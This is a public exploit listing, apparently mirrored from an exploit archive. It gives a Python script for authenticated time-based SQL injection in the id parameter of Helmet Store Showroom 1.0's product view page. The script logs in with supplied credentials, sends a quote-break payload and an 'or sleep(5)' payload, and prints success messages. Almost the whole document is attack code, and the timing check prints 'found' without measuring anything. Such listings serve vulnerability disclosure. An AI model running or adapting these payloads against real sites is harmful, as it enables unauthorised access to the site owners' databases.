Share
## https://sploitus.com/exploit?id=PACKETSTORM:170014
# Exploit Title: Helmet Store Showroom 1.0 - authenticated SQL Injection  
# Date: 25-11-2022  
# Exploit Author: syad  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html  
# Version: 1.0  
# Tested on: Windows 10 + XAMPP 3.2.4  
# CVE ID : N/A  
  
# Description  
  
# The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection.  
  
  
import requests  
import sys  
import pyfiglet  
sess = requests.Session()  
  
  
proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}  
  
def login1(ip,username,password):  
x = "http://%s/hss/classes/Login.php?f=login" % ip  
login = {'username':username, 'password':password}  
r = sess.post(x, data=login, proxies=proxies)  
#print(r.content)  
  
  
  
def login(ip):  
x = ("http://%s/hss/admin") % ip  
r = sess.get(x,proxies=proxies)  
if "Welcome to Helmet Store Showroom - PHP" in r.text:  
print("--------------------------------------------")  
print("[+] Success Login")  
  
  
def detect_sql(ip):  
x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip  
r = sess.get(x,proxies=proxies)  
if "You have an error in your SQL syntax" in r.text:  
print("[+] Found SQL Error")  
  
  
def time_based_sqli(ip):  
x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip  
r = sess.get(x,proxies=proxies)  
print("[+] Time Based SQL Found")  
print("[*]!!! Time To Report !!!")  
  
  
  
  
  
  
if __name__ == "__main__":  
result = pyfiglet.figlet_format("PWN")  
print(result)  
try:  
ip = sys.argv[1].strip()  
username = sys.argv[2].strip()  
password = sys.argv[3].strip()  
except IndexError:  
print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])  
print("[-] Example: %s 192.168.1.x" % sys.argv[0])  
sys.exit(-1)  
  
login1(ip,username,password)  
login(ip)  
detect_sql(ip)  
time_based_sqli(ip)